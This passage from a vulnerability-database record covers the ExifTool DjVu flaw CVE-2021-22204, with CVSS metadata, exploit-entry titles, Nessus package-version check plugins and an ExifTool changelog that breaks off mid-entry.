"scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-04T09:01:07", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205", "CVE-2021-2205", "CVE-2021-22204"], "modified": "2021-11-04T09:01:59", "id": "400AD2B4-EBCE-5934-92E0-C32C59BFA420", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-30T09:45:37", "description": "### Vuln Impact\r\n\r\nAn issue has been discovered in GitLab CE/EE ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-29T04:30:45", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-2205", "CVE-2021-22204", "CVE-2021-22205"], "modified": "2022-03-30T09:27:05", "id": "F13B1CEC-8713-5A1E-8117-F6BED15AEA04", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-29T20:19:01", "description": "<p align=\"center\">\n <h3 align=\"center\">Security Research</h3>\n ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T23:38:36", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9376", "CVE-2020-9377", "CVE-2021-22204", "CVE-2021-41773"], "modified": "2022-03-29T00:45:16", "id": "4427DEE4-E1E2-5A16-8683-D74750941604", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:30:05", "description": "A remote code execution vulnerability exists in ExifTool. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-13T00:00:00", "type": "checkpoint_advisories", "title": "ExifTool Remote Code Execution (CVE-2021-22204)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-12-27T00:00:00", "id": "CPAI-2021-0912", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-24T14:47:50", "description": "A vulnerability was discovered in libimage-exiftool-perl, a library and program to read and write meta information in multimedia files, which may result in execution of arbitrary code if a malformed DjVu file is processed.\n\nFor Debian 9 stretch, this problem has been fixed in version 10.40-1+deb9u1.\n\nWe recommend that you upgrade your libimage-exiftool-perl packages.\n\nFor the detailed security status of libimage-exiftool-perl please refer to its security tracker page at:\nhttps://security-tracker.debian.org/tracker/libimage-exiftool-perl\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-17T00:00:00", "type": "nessus", "title": "Debian DLA-2663-1 : libimage-exiftool-perl security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-12-14T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libimage-exiftool-perl", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2663.NASL", "href": "https://www.tenable.com/plugins/nessus/149515", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2663-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(149515);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/12/14\");\n\n script_cve_id(\"CVE-2021-22204\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n\n script_name(english:\"Debian DLA-2663-1 : libimage-exiftool-perl security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A vulnerability was discovered in libimage-exiftool-perl, a library\nand program to read and write meta information in multimedia files,\nwhich may result in execution of arbitrary code if a malformed DjVu\nfile is processed.\n\nFor Debian 9 stretch, this problem has been fixed in version\n10.40-1+deb9u1.\n\nWe recommend that you upgrade your libimage-exiftool-perl packages.\n\nFor the detailed security status of libimage-exiftool-perl please\nrefer to its security tracker page at:\nhttps://security-tracker.debian.org/tracker/libimage-exiftool-perl\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2021/05/msg00018.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/libimage-exiftool-perl\"\n );\n # https://security-tracker.debian.org/tracker/source-package/libimage-exiftool-perl\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?df5f9b2e\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade the affected libimage-exiftool-perl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ExifTool DjVu ANT Perl injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libimage-exiftool-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"libimage-exiftool-perl\", reference:\"10.40-1+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T14:41:34", "description": "A vulnerability was discovered in libimage-exiftool-perl, a library and program to read and write meta information in multimedia files, which may result in execution of arbitrary code if a malformed DjVu file is processed.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-03T00:00:00", "type": "nessus", "title": "Debian DSA-4910-1 : libimage-exiftool-perl - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-12-14T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libimage-exiftool-perl", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4910.NASL", "href": "https://www.tenable.com/plugins/nessus/149218", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4910. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(149218);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/12/14\");\n\n script_cve_id(\"CVE-2021-22204\");\n script_xref(name:\"DSA\", value:\"4910\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n\n script_name(english:\"Debian DSA-4910-1 : libimage-exiftool-perl - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A vulnerability was discovered in libimage-exiftool-perl, a library\nand program to read and write meta information in multimedia files,\nwhich may result in execution of arbitrary code if a malformed DjVu\nfile is processed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=987505\"\n );\n # https://security-tracker.debian.org/tracker/source-package/libimage-exiftool-perl\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?df5f9b2e\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/libimage-exiftool-perl\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2021/dsa-4910\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the libimage-exiftool-perl packages.\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 11.16-1+deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22204\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ExifTool DjVu ANT Perl injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libimage-exiftool-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"libimage-exiftool-perl\", reference:\"11.16-1+deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-24T14:47:31", "description": "This update for perl-Image-ExifTool fixes the following issues :\n\nUpdate to version 12.25 fixes (boo#1185547 CVE-2021-22204)\n\n - JPEG XL support is now official\n\n - Added read support for Medical Research Council (MRC) image files\n\n - Added ability to write a number of 3gp tags in video files\n\n - Added a new Sony PictureProfile value (thanks Jos Roost)\n\n - Added a new Sony LensType (thanks LibRaw)\n\n - Added a new Nikon LensID (thanks Niels Kristian Bech Jensen)\n\n - Added a new Canon LensType\n\n - Decode more GPS information from Blackvue dashcam videos\n\n - Decode a couple of new NikonSettings tags (thanks Warren Hatch)\n\n - Decode a few new RIFF tags\n\n - Improved Validate option to add minor warning if standard XMP is missing xpacket wrapper\n\n - Avoid decoding some large arrays in DNG images to improve performance unless the -m option is used\n\n - Patched bug that could give runtime warning when trying to write an empty XMP structure\n\n - Fixed decoding of ImageWidth/Height for JPEG XL images\n\n - Fixed problem were Microsoft Xtra tags couldn't be deleted\n\nversion 12.24 :\n\n - Added a new PhaseOne RawFormat value (thanks LibRaw)\n\n - Decode a new Sony tag (thanks Jos Roost)\n\n - Decode a few new Panasonic and FujiFilm tags (thanks LibRaw and Greybeard)\n\n - Patched security vulnerability in DjVu reader\n\n - Updated acdsee.config in distribution (thanks StarGeek)\n\n - Recognize AutoCAD DXF files\n\n - More work on experimental JUMBF read support\n\n - More work on experimental JPEG XL read/write support\n\nversion 12.23 :\n\n - Added support for Olympus ORI files\n\n - Added experimental read/write support for JPEG XL images\n\n - Added experimental read support for JUMBF metadata in JPEG and Jpeg2000 images\n\n - Added built-in support for parsing GPS track from Denver ACG-8050 videos with the -ee option\n\n - Added a some new Sony lenses (thanks Jos Roost and LibRaw)\n\n - Changed priority of Samsung trailer tags so the first DepthMapImage takes precedence when -a is not used\n\n - Improved identification of M4A audio files\n\n - Patched to avoid escaping ',' in 'Binary data' message when\n\n -struct is used\n\n - Removed Unknown flag from MXF VideoCodingSchemeID tag\n\n - Fixed -forcewrite=EXIF to apply to EXIF in binary header of EPS files\n\n - API Changes :\n\n + Added BlockExtract option\n\nversion 12.22 :\n\n - Added a few new Sony LensTypes and a new SonyModelID (thanks Jos Roost and LibRaw)\n\n - Added Extra BaseName tag\n\n - Added a new CanonModelID (thanks LibRaw)\n\n - Decode timed GPS from unlisted programs in M2TS videos with the -ee3 option\n\n - Decode more Sony rtmd tags\n\n - Decode some tags for the Sony ILME-FX3 (thanks Jos Roost)\n\n - Allow negative values to be written to XMP-aux:LensID\n\n - Recognize HEVC video program in M2TS files\n\n - Enhanced -b option so --b suppresses tags with binary data\n\n - Improved flexibility when writing GPS coordinates :\n\n + Now pulls latitude and longitude from a combined GPSCoordinates string\n\n + Recognizes the full word 'South' and 'West' to write negative coordinates\n\n - Improved warning when trying to write an integer QuickTime date/time tag and Time::Local is not available\n\n - Convert GPSSpeed from mph to km/h in timed GPS from Garmin MP4 videos\n\nversion 12.21 :\n\n - Added a few new iOS QuickTime tags\n\n - Decode a couple more Sony rtmd tags\n\n - Patch to avoid possible 'Use of uninitialized value' warning when attempting to write QuickTime date/time tags with an invalid value\n\n - Fixed problem writing Microsoft Xtra tags\n\n - Fixed Windows daylight savings time patch for file times that was broken in 12.19 (however directory times will not yet handle DST properly)\n\nversion 12.20 :\n\n - Added ability to write some Microsoft Xtra tags in MOV/MP4 videos\n\n - Added two new Canon LensType values (thanks Norbert Wasser)\n\n - Added a new Nikon LensID\n\n - Fixed problem reading FITS comments that start before column 11\n\nversion 12.19 :\n\n - Added -list_dir option\n\n - Added the 'ls-l' Shortcut tag\n\n - Extract Comment and History from FITS files\n\n - Enhanced FilePermissions to include device type (similar to 'ls -l')\n\n - Changed the name of Apple ContentIdentifier tag to MediaGroupUUID (thanks Neal Krawetz)\n\n - Fixed a potential 'substr outside of string' runtime error when reading corrupted EXIF\n\n - Fixed edge case where NikonScanIFD may not be copied properly when copying MakerNotes to another file\n\n - API Changes :\n\n + Added ability to read/write System tags of directories\n\n + Enhanced GetAllGroups() to support family 7 and take optional ExifTool reference\n\n + Changed QuickTimeHandler option default to 1\n\nversion 12.18 :\n\n - Added a new SonyModelID\n\n - Decode a number of Sony tags for the ILCE-1 (thanks Jos Roost)\n\n - Decode a couple of new Canon tags (thanks LibRaw)\n\n - Patched to read differently formatted UserData:Keywords as written by iPhone\n\n - Patched to tolerate out-of-order Nikon MakerNote IFD entries when obtaining tags necessary for decryption\n\n - Fixed a few possible Condition warnings for some NikonSettings tags\n\nversion 12.17 :\n\n - Added a new Canon FocusMode value\n\n - Added a new FujiFilm FilmMode value\n\n - Added a number of new XMP-crs tags (thanks Herb)\n\n - Decode a new H264 MDPM tag\n\n - Allow non-conforming lower-case XMP boolean 'true' and 'false' values to be written, but only when print conversion is disabled\n\n - Improved Validate option to warn about non-capitalized boolean XMP values\n\n - Improved logic for setting GPSLatitude/LongitudeRef values when writing\n\n - Changed -json and -php options so the -a option is implied even without the -g option\n\n - Avoid extracting audio/video data from AVI videos when\n -ee\n\n -u is used\n\n - Patched decoding of Canon ContinuousShootingSpeed for newer firmware versions of the EOS-1DXmkIII\n\n - Re-worked LensID patch of version 12.00 (github issue #51)\n\n - Fixed a few typos in newly-added NikonSettings tags (thanks Herb)\n\n - Fixed problem where group could not be specified for PNG-pHYs tags when writing version 12.16 :\n\n - Extract another form of video subtitle text\n\n - Enhanced -ee option with -ee2 and -ee3 to allow parsing of the H264 video stream in MP4 files\n\n - Changed a Nikon FlashMode value\n\n - Fixed problem that caused a failed DPX test on Strawberry Perl\n\n - API Changes :\n\n + Enhanced ExtractEmbedded option\n\nversion 12.15 :\n\n - Added a couple of new Sony LensType values (thanks LibRaw and Jos Roost)\n\n - Added a new Nikon FlashMode value (thanks Mike)\n\n - Decode NikonSettings (thanks Warren Hatch)\n\n - Decode thermal information from DJI RJPEG images\n\n - Fixed extra newline in -echo3 and -echo4 outputs added in version 12.10\n\n - Fixed out-of-memory problem when writing some very large PNG files under Windows\n\nversion 12.14 :\n\n - Added support for 2 more types of timed GPS in video files (that makes 49 different formats now supported)\n\n - Added validity check for PDF trailer dictionary Size\n\n - Added a new Pentax LensType\n\n - Extract metadata from Jpeg2000 Association box\n\n - Changed -g:XX:YY and -G:XX:YY options to show empty strings for non-existent groups\n\n - Patched to issue warning and avoid writing date/time values with a zero month or day number\n\n - Patched to avoid runtime warnings if trying to set FileName to an empty string\n\n - Fixed issue that could cause GPS test number 12 to fail on some systems\n\n - Fixed problem extracting XML as a block from Jpeg2000 images, and extract XML tags in the XML group instead of XMP\n\n - Update URL\n\nupdate to 12.13 :\n\n - Add time zone automatically to most string-based QuickTime date/time tags when writing unless the PrintConv option is disabled\n\n - Added -i HIDDEN option to ignore files with names that start with '.'\n\n - Added a few new Nikon ShutterMode values (thanks Jan Skoda)\n\n - Added ability to write Google GCamera MicroVideo XMP tags\n\n - Decode a new Sony tag (thanks LibRaw)\n\n - Changed behaviour when writing only pseudo tags to return an error and avoid writing any other tags if writing FileName fails\n\n - Print 'X image files read' message even if only 1 file is read when at least one other file has failed the -if condition\n\n - Added ability to geotag from DJI CSV log files\n\n - Added a new CanonModelID\n\n - Added a couple of new Sony LensType values (thanks LibRaw)\n\n - Enhanced -csvDelim option to allow '\\t', ' ', '\\r' and '\\\\'\n\n - Unescape '\\b' and '\\f' in imported JSON values\n\n - Fixed bug introduced in 12.10 which generated a 'Not an integer' warning when attempting to shift some QuickTime date/time tags\n\n - Fixed shared-write permission problem with -@ argfile when using -stay_open and a filename containing special characters on Windows\n\n - Added -csvDelim option\n\n - Added new Canon and Olympus LensType values (thanks LibRaw)\n\n - Added a warning if ICC_Profile is deleted from an image (github issue #63)\n\n - EndDir() function for -if option now works when\n -fileOrder is used\n\n - Changed FileSize conversion to use binary prefixes since that is how the conversion is currently done (eg. MiB instead of MB)\n\n - Patched -csv option so columns aren't resorted when using -G option and one of the tags is missing from a file\n\n - Fixed incompatiblity with Google Photos when writing UserData:GPSCoordinates to MP4 videos\n\n - Fixed problem where the tags available in a -p format string were limited to the same as the -if[NUM] option when NUM was specified\n\n - Fixed incorrect decoding of SourceFileIndex/SourceDirectoryIndex for Ricoh models\n\nUpdate to 12.10\n\n - Added -validate test for proper TIFF magic number in JPEG EXIF header\n\n - Added support for Nikon Z7 LensData version 0801\n\n - Added a new XMP-GPano tag\n\n - Decode ColorData for the Canon EOS 1DXmkIII\n\n - Decode more tags for the Sony ILCE-7SM3\n\n - Automatically apply QuickTimeUTC option for CR3 files\n\n - Improved decoding of XAttrMDLabel from MacOS files\n\n - Ignore time zones when writing date/time values and using the -d option\n\n - Enhanced -echo3 and -echo4 options to allow exit status to be returned\n\n - Changed -execute so the -q option no longer suppresses the '(ready)' message when a synchronization number is used\n\n - Added ability to copy CanonMakerNotes from CR3 images to other file types\n\n - Added read support for ON1 presets file (.ONP)\n\n - Added two new CanonModelID values\n\n - Added trailing '/' when writing QuickTime:GPSCoordinates\n\n - Added a number of new XMP-crs tags\n\n - Added a new Sony LensType (thanks Jos Roost)\n\n - Added a new Nikon Z lens (thanks LibRaw)\n\n - Added a new Canon LensType\n\n - Decode ColorData for Canon EOS R5/R6\n\n - Decode a couple of new HEIF tags\n\n - Decode FirmwareVersion for Canon M50\n\n - Improved decoding of Sony CreativeStyle tags\n\n - Improved parsing of Radiance files to recognize comments\n\n - Renamed GIF AspectRatio tag to PixelAspectRatio\n\n - Patched EndDir() feature so subdirectories are always processed when -r is used (previously, EndDir() would end processing of a directory completely)\n\n - Avoid loading GoPro module unnecessarily when reading MP4 videos from some other cameras\n\n - Fixed problem with an incorrect naming of CodecID tags in some MKV videos\n\n - Fixed verbose output to avoid 'adding' messages for existing flattened XMP tags\n\n - Added a new Sony LensType\n\n - Recognize Mac OS X xattr files\n\n - Extract ThumbnailImage from MP4 videos of more dashcam models\n\n - Improved decoding of a number of Sony tags\n\n - Fixed problem where the special -if EndDir() function didn't work properly for directories after the one in which it was initially called\n\n - Patched to read DLL files which don't have a .rsrc section\n\n - Patched to support new IGC date format when geotagging\n\n - Patched to read DLL files with an invalid size in the header \n\n - Added support for GoPro .360 videos\n\n - Added some new Canon RF and Nikkor Z lenses\n\n - Added some new Sony LensType and CreativeStyle values and decode some ILCE-7C tags\n\n - Added a number of new Olympus SceneMode values\n\n - Added a new Nikon LensID\n\n - Decode more timed metadata from Insta360 videos\n\n - Decode timed GPS from videos of more Garmin dashcam models\n\n - Decode a new GoPro video tag\n\n - Reformat time-only EventTime values when writing and prevent arbitrary strings from being written\n\n - Patched to accept backslashes in SourceFile entries for\n -csv option\n\nupdate to 12.06\n\n - Added read support for Lyrics3 metadata (and fixed problem where APE metadata may be ignored if Lyrics3 exists)\n\n - Added a new Panasonic VideoBurstMode value\n\n - Added a new Olympus MultipleExposureMode value\n\n - Added a new Nikon LensID\n\n - Added back conversions for XMP-dwc EventTime that were removed in 12.04 with a patch to allow time-only values\n\n - Decode GIF AspectRatio\n\n - Decode Olympus FocusBracketStepSize\n\n - Extract PNG iDOT chunk in Binary format with the name AppleDataOffsets\n\n - Process PNG images which do not start with mandatory IHDR chunk\n\n - Added a new Panasonic SelfTimer value\n\n - Decode a few more DPX tags\n\n - Extract 